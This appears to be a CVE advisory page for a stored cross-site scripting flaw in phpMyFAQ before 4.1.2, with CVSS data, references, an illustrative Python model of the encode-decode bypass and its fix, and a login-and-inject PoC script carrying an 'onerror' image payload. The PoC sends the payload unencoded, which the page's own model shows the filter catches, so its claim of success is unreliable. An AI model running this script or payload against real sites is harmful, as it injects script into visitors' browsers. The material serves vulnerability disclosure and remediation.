Security Vulnerability Report
CVE-2026-46363 CVSS 5.4 MEDIUM

Published: 2026-05-15 19:17:04
Last Modified: 2026-05-15 21:16:39

Description

phpMyFAQ before 4.1.2 contains a stored cross-site scripting vulnerability in its FAQ creation and update endpoints: input that passes through encode-decode cycles bypasses the sanitization those endpoints apply. An authenticated attacker with the FAQ_ADD permission can inject script markup via the question or answer parameters; the injected markup executes in every visitor's browser because FAQ content is rendered with Twig's raw filter, which turns off output escaping for that value. Upgrading to 4.1.2 or later removes the issue.
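The following Python model, added here as an illustration and not taken from phpMyFAQ or the advisory, shows the bug class the description names: a filter that inspects the submitted string before entities are decoded, a decode step that runs afterwards, and a template that emits the stored value without escaping (the behaviour of Twig's raw filter). The sanitizer, the storage pipeline and the rendering function are hypothetical stand-ins, not the project's code; the encoded payload it produces is also the kind of input the PoC section below says "might need specific encoding".

```python
"""
Hypothetical model of an encode-decode sanitization bypass (the bug class
behind CVE-2026-46363). None of these functions is phpMyFAQ code; they model
the ordering mistake: check first, decode second, render raw third.
"""
import html
import re

# Constructed attacker payload, the same one used in the PoC on this page.
PAYLOAD = '<img src=x onerror=alert(1)>'

# Hypothetical sanitizer: drops anything that looks like a tag.
TAG_RE = re.compile(r"<[^>]*>")
# Detector for markup that would execute in a browser: an inline on* handler
# or a script tag.
ACTIVE_RE = re.compile(r"<\s*\w+[^>]*\son\w+\s*=|<\s*script\b", re.I)


def strip_tags(value: str) -> str:
    return TAG_RE.sub("", value)


def encode_for_bypass(payload: str) -> str:
    # What the attacker submits: the tag entity-encoded, so the tag filter
    # never sees a literal '<'.
    return html.escape(payload, quote=False)


def store_vulnerable(submitted: str) -> str:
    # Vulnerable ordering: sanitize the encoded form, then decode entities.
    cleaned = strip_tags(submitted)
    return html.unescape(cleaned)


def render_raw(stored: str) -> str:
    # Models {{ stored|raw }}: the value is emitted with no output escaping.
    return f"<div class='answer'>{stored}</div>"


def canonicalize(value: str, max_rounds: int = 5) -> str:
    # Decode to a fixpoint so double-encoded input ("&amp;lt;") cannot
    # survive a single decode pass.
    for _ in range(max_rounds):
        decoded = html.unescape(value)
        if decoded == value:
            return value
        value = decoded
    return value


def store_hardened(submitted: str) -> str:
    # Hardened ordering: decode first, then sanitize the canonical form.
    return strip_tags(canonicalize(submitted))


def render_escaped(stored: str) -> str:
    # Models {{ stored }} with autoescaping left on: '<' becomes '&lt;'.
    return f"<div class='answer'>{html.escape(stored, quote=True)}</div>"


def contains_active_markup(rendered: str) -> bool:
    return ACTIVE_RE.search(rendered) is not None


def run_demo() -> dict:
    encoded = encode_for_bypass(PAYLOAD)
    return {
        "encoded_payload": encoded,
        # The plain tag is caught by the filter even in the vulnerable pipeline.
        "plain_vulnerable": contains_active_markup(render_raw(store_vulnerable(PAYLOAD))),
        # The encoded tag slips past the filter, is decoded, and renders raw.
        "encoded_vulnerable": contains_active_markup(render_raw(store_vulnerable(encoded))),
        # Decode-then-sanitize plus escaped output blocks both forms.
        "encoded_hardened": contains_active_markup(render_escaped(store_hardened(encoded))),
        "plain_hardened": contains_active_markup(render_escaped(store_hardened(PAYLOAD))),
    }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

The two things to take from the model: the order of decode and sanitize matters, because a check applied to an encoded representation says nothing about the decoded bytes that are actually stored; and removing raw from the template (or escaping at render time) closes the sink even when the filter is bypassed, which is why fixing only one of the two is an incomplete remediation.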

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Vector breakdown
Attack Vector: Network; Attack Complexity: Low; Privileges Required: Low (an account holding FAQ_ADD); User Interaction: Required (a visitor must view the FAQ); Scope: Changed; Confidentiality: Low; Integrity: Low; Availability: None. Exploitability subscore 2.3, impact subscore 2.7.
Weakness
CWE-79 (Improper Neutralization of Input During Web Page Generation)

Configurations (Affected Products)

phpMyFAQ < 4.1.2 (fixed in 4.1.2)

No CPE configuration data is attached to the NVD record yet (vulnStatus: Received); the affected range above is taken from the description.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC for CVE-2026-46363
# This script demonstrates the injection of a payload into phpMyFAQ.
# Requires authentication with FAQ_ADD permissions.
import requests


def exploit(target, username, password):
    session = requests.Session()

    # 1. Authenticate
    login_url = f"{target}/index.php?action=login"
    creds = {"username": username, "password": password}
    login_res = session.post(login_url, data=creds)
    login_res.raise_for_status()

    # 2. Inject Payload (simplified representation of the encode-decode bypass)
    # The payload might need specific encoding to bypass the initial filter.
    # The 'raw' Twig filter ensures execution upon rendering.
    xss_payload = '<img src=x onerror=alert(1)>'
    add_faq_url = f"{target}/index.php?action=save"
    data = {
        "question": xss_payload,
        "answer": "This answer contains stored XSS.",
        "submit": "Save",
    }
    res = session.post(add_faq_url, data=data)

    # A 200 only shows the request was accepted, not that the payload was
    # stored unsanitized; confirm by viewing the FAQ entry in a browser.
    if res.status_code == 200:
        print("[+] Payload injected successfully!")
        print(f"[+] Check the FAQ page at {target}/index.php?action=faq")
    else:
        print("[-] Injection failed.")


# Usage
# exploit("http://localhost/phpmyfaq", "admin", "password")
```

References

- https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-f5p7-2c9q-8896 (GitHub Security Advisory)
- https://www.vulncheck.com/advisories/phpmyfaq-stored-xss-in-faq-question-answer-via-encode-decode-bypass (VulnCheck advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-46363",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-15T19:17:03.633",
    "lastModified": "2026-05-15T21:16:38.863",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "phpMyFAQ before 4.1.2 contains a stored cross-site scripting vulnerability in FAQ creation and update endpoints that bypass sanitization through encode-decode cycles. The vulnerability allows authenticated attackers with FAQ_ADD permission to inject malicious script tags via question or answer parameters, which execute in every visitor's browser when FAQ content is rendered with the raw Twig filter."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-f5p7-2c9q-8896",
        "source": "[email protected]"
      },
      {
        "url": "https://www.vulncheck.com/advisories/phpmyfaq-stored-xss-in-faq-question-answer-via-encode-decode-bypass",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-f5p7-2c9q-8896",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}
```